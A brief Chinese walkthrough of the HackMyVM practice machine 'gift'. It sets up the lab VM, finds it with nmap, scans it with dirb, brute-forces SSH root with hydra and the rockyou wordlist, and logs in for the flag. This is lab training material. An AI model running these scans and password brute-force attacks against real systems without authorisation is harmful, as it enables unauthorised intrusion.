hackmyvm之gift

hackmyvm之gift"/>

hackmyvm之gift

hackmyvm是一个平台，包含了大量靶机，类似于vulnhub、hackthebox等平台，你可以在上面下载靶机，进行渗透测试练习，非常适合热爱黑客技术或从事渗透测试的人员。

（这段解释参考这篇文章）

下载安装

（需要科学上网）
下载地址：/

进去之后注册登陆账号

点击machines，下载需要的虚拟机

靶机下载完成之后，导入VMware

但是导入过程中出现了下面的报错

重启电脑什么的也没用，应该是自己下的虚拟机有问题，于是我重新下载了个虚拟机，就可以成功运行了

靶机gift

因为靶机gift和kali都在VM中，所以将两者都改为nat模式。

打开kali

查看kali ip

ifconfig
查出来是192.168.25.139

靶机和kali都是nat模式，用nmap扫描同网段的存活主机,这样就可以找到靶机的ip

nmap -sP 192.168.25.0/24

查找靶机开放端口

nmap -A -p 1-1000 192.168.25.150

访问80端口

扫描目录,无果

dirb http://192.168.25.150

转战ssh，因为没有告诉靶机ssh密码信息，所以选择直接爆破

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://192.168.25.150

有了密码之后，远程连接,拿到flag

ssh root@192.168.25.150